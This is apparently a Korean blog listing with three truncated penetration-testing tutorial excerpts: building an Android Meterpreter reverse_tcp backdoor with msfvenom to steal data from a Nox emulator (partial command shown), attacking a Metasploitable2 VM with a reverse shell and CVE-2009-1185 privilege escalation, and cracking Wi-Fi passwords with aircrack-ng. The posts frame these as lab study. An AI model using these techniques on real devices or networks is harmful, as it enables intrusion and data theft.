안녕하세요! 오늘은 kali Linux에 있는 metasploit 툴의 하나인 msfvenom을 통해서 백도어를 만든후 nox 프로그램에 잠입하여 민감한 정보를 탈취하는 것을 목표로 하는 포스팅입니다. ※ 해당 실습은 가상머신으로 이루어진 글입니다. 실제 외부 네트워크에서 진행할 시 불법이므로 모든 책임은 본인에게 있습니다. 우선 준비물은 아래와 같습니다.Kali LinuxNox 앱플레이어1. 우선 칼리리눅스를 실행합니다. 2. 명령어창의 ifconfig 명령어를 입력하여 Kali의 IP Address 를 확인합니다. 3. 이후 아래의 명령어를 사용하여 백도어 앱을 만들어줍니다. 사용된 명령어는 아래와 같습니다.명령어 : msfvenom -p android/meterpreter/reverse_Tcp LH..

오늘은 칼리리눅스에 내장된 메타스플로잇(Metasploit)이라는 툴을 이용하여 메타스플로잇터블 2(Metasploitable) 서버를 침투하는 과정을 실습해 볼 것입니다.  공격자 서버: kali linux타겟 서버: metasploitable2실습 전 준비물: metasploit , nmap        ※ 공격시나리오정보수집 (nmap 사용)침투 (metasploit 사용)권한획득 (리버스 쉘 이용)권한상승 (CVE-2009-1185 취약점 관련 내용 사용)- 우선 Metaexploitable2 가 없으신 분들은 아래 페이지에서 다운로드하신 후 VMware에 추가해 주세요. https://sourceforge.net/projects/metasploitable/files/Metasploitable2/..

[실습 전 준비사항]  ※ 본 실습내용은 공부목적으로만 사용되어야 함을 알려드립니다!  칼리 리눅스에는 여러 유용한 툴들이 많습니다. 오늘은 이중에 aircrack-ng라는 툴을 사용하여 Wifi의 비밀번호를 유추하는 실습을 진행해보려고 합니다. 아래는 실습에 필요한 준비물입니다. 칼리 리눅스랜카드(모니터 모드 사용가능해야 함)  이번 실습에서는 랜카드가 필요합니다. VMware 같은 가상머신으로 칼리리눅스를 돌리게 될 경우 가상머신에서 돌아가는 운영체제들은 무선랜 기능이 없는 상태입니다. 와이파이를 사용하지 못하는 데스크톱과 같은 상태인 것이죠. 따라서 칼리 리눅스가 와이파이를 잡을 수 있게 하려면 랜카드가 필요합니다. 또한 그냥 랜카드가 아닌 모니터 모드를 지원하는 랜카드를 사용하셔야 합니다. 모니터..